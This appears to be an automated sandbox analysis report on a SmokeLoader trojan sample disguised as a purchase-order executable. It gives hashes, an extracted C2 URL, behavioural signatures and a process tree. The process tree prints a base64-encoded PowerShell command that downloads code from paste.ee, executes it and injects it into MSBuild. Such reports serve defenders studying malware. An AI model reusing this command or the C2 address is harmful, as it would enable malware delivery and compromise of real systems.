Analysis
-
max time kernel
68s -
max time network
119s -
platform
windows10_x64 -
resource
win10 -
submitted
14-08-2020 08:27
Static task
static1
Behavioral task
behavioral1
Sample
Purchase Order 21PTAES2110-2.pif.exe
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Purchase Order 21PTAES2110-2.pif.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Purchase Order 21PTAES2110-2.pif.exe
-
Size
173KB
-
MD5
12f34f9b5d3817801893ee1aad6a5ef3
-
SHA1
d0e8e93451aaea3571419169e5fd73a5f2a31cc2
-
SHA256
966c1a5412af27dde07c13cbb17b743eec085d16aeac60849af71d376d1452ac
-
SHA512
5fd48762f0c164f3a38530cf98655d3151ccac4c3d7abad4e02285bb8946817356b10d1e30c052d6f0012a85ed8257f413aaff3397877d3dc36b9bb7f8a2d606
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2018
C2
http://5by80.com/1/
rc4.i32
rc4.i32
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blacklisted process makes network request 1 IoCs
flow pid Process 7 3436 powershell.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum MSBuild.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 MSBuild.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3436 set thread context of 2596 3436 powershell.exe 69 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1536 Purchase Order 21PTAES2110-2.pif.exe 1536 Purchase Order 21PTAES2110-2.pif.exe 3436 powershell.exe 3436 powershell.exe 3436 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2596 MSBuild.exe 2596 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1536 Purchase Order 21PTAES2110-2.pif.exe Token: SeDebugPrivilege 3436 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1536 wrote to memory of 3436 1536 Purchase Order 21PTAES2110-2.pif.exe 68 PID 1536 wrote to memory of 3436 1536 Purchase Order 21PTAES2110-2.pif.exe 68 PID 1536 wrote to memory of 3436 1536 Purchase Order 21PTAES2110-2.pif.exe 68 PID 3436 wrote to memory of 2596 3436 powershell.exe 69 PID 3436 wrote to memory of 2596 3436 powershell.exe 69 PID 3436 wrote to memory of 2596 3436 powershell.exe 69 PID 3436 wrote to memory of 2596 3436 powershell.exe 69 PID 3436 wrote to memory of 2596 3436 powershell.exe 69 PID 3436 wrote to memory of 2596 3436 powershell.exe 69
Processes
-
C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe"C:\Users\Admin\AppData\Local\Temp\Purchase Order 21PTAES2110-2.pif.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AVwBhAHkAdQBXACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACAAIgA0ADQAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAKgAiACwAIAAiADQAOAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAjACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBZAFQAaQBGAFIAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=2⤵
- Blacklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:2596
-
-